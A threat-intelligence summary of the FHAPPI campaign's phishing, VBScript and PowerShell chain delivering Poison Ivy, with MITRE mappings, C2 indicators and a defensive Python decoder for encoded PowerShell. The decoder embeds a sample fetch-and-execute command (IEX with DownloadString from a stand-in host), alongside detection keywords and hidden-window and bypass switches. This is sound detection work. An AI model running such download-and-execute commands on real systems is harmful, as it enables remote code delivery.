FHAPPI is an APT campaign that used Geocities hosting to deliver a VBScript-based downloader which then loads PowerShell-encoded payloads to install Poison Ivy. The analysis traces a multi-stage infection—from Geocities-hosted VBScript to PowerShell, a PowerSploit PoC, and memory-resident Poison Ivy with C2 traffic—highlighting its fileless, multi-encoded delivery chain. #FHAPPI #PoisonIvy #PowerSploit #GeocitiesJP #VBScript #Shellcode
Key points
- FHAPPI is a pivoted APT campaign using Geocities Japan accounts to host malicious samples.
- An APT phishing email linked to a Geocities-hosted downloader initiates the infection.
- The hosted sample is a VBScript-encoded script that decodes and spawns PowerShell commands.
- The PowerShell sequence downloads and executes additional payloads (a .doc and a .ps1) via base64-encoded commands and IEX.
- The main payload is a Poison Ivy shellcode injected into a fake userinit.exe process, with multi-layered encoding and memory-only execution.
- C2/network traffic reveals a domain (outlooksysm.net) and a South Korea-based IP (61.97.243.15) used for callback and control.
- The campaign was mitigated through coordinated takedowns and analysis efforts, leading to FHAPPI being named and described publicly.
MITRE Techniques
- [T1566.001] Phishing – “VXRL(credit) contacted us regarding an APT phishing email that included a download link to a malware being hosted on a Geocities website.”
- [T1059.005] Visual Basic – “The contents of the hosted malware file was VBScript encoded script.”
- [T1059.001] PowerShell – “powershell.exe -w hidden -ep bypass -Enc 'etc etc etc'.”
- [T1105] Ingress Tool Transfer – “This script creates a web client object and uses the proxy setting and user rights to download a file from a url and execute the file.”
- [T1027] Obfuscated/Compressed Files and Information – “multilayered base64 encoding is original to this sample.”
- [T1055] Process Injection – “Poison Ivy shellcode during injection of the userinit.exe process was directly/indirectly involved in loading the necessary DLLs in the kernel space.”
- [T1071] Web Protocols – “The CNC and Network Traffic… hostname and IP address for the callback” and “Hostname: web.outlooksysm.net”.
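As an added defender-side example (not code from the MalwareMustDie report), the following Python decodes `powershell.exe ... -Enc` command lines of the kind quoted above, peeling nested UTF-16LE base64 layers and flagging the download-and-execute markers (IEX, WebClient DownloadString) together with the hidden-window and execution-policy-bypass switches. The sample command lines, the `example.invalid` URL and the keyword list are constructed for the demonstration.

```python
import base64
import re

# Constructed inner payload in the style of the FHAPPI chain: a WebClient download piped into IEX.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"


def encode_ps(cmd: str) -> str:
    """Encode a command the way PowerShell -EncodedCommand expects it: base64 of UTF-16LE."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines: one benign, one single-layer, one double-layer.
SAMPLE_LINES = [
    "cmd.exe /c dir",
    f"powershell.exe -w hidden -ep bypass -Enc {encode_ps(INNER)}",
    f"powershell.exe -Enc {encode_ps('powershell.exe -w hidden -Enc ' + encode_ps(INNER))}",
]

# -EncodedCommand and its short aliases, followed by a base64 blob (longer alternatives first).
ENC_RE = re.compile(r"-(?:EncodedCommand|Enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile", "FromBase64String")


def unwrap_encoded(cmdline: str, max_depth: int = 5) -> list:
    """Peel nested -Enc layers; return the decoded plaintext of each layer, outermost first."""
    layers, current = [], cmdline
    for _ in range(max_depth):
        m = ENC_RE.search(current)
        if not m:
            break
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE text
            break
        layers.append(decoded)
        current = decoded
    return layers


def analyze(cmdline: str) -> dict:
    """Score one command line: decoded layers, keyword hits, and the -w hidden / -ep bypass switches."""
    layers = unwrap_encoded(cmdline)
    text = " ".join([cmdline] + layers).lower()
    hits = [k for k in SUSPICIOUS if k.lower() in text]
    hidden = bool(re.search(r"-w(?:indowstyle)?\s+hidden", text))
    bypass = bool(re.search(r"-e(?:xecutionpolicy|p)\s+bypass", text))
    return {"layers": len(layers), "hits": hits, "hidden": hidden, "bypass": bypass,
            "suspicious": bool(layers) and (bool(hits) or (hidden and bypass))}
```

Run `analyze()` over each line of a process-creation log; decoded layers, not just the outer base64, are what an analyst needs to compare against the report's IEX/DownloadString description.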
Indicators of Compromise
- [Domain] Geocities.jp domain – vbiayay1 – used to host the malware sample
- [IP] 61.97.243.15 – a dial-up IP used as a Poison Ivy CNC/C2 endpoint
- [IP] 61.97.243.0/24 – broader range associated with the CNC context
- [Domain] outlooksysm.net – C2 domain used for callbacks; WHOIS details included
- [Hash] MD5 – 0011fb4f42ee9d68c0f2dc62562f53e0, b862a2cfe8f79bdbb4e1d39e0cfcae3a, and 7 more hashes
- [File] Meeting_sumxx.doc and Meeting_xxx.doc – sample document names tied to the campaign
Read more: https://blog.malwaremustdie.org/2024/06/mmd-068-2024-english-report-of-fhappi.html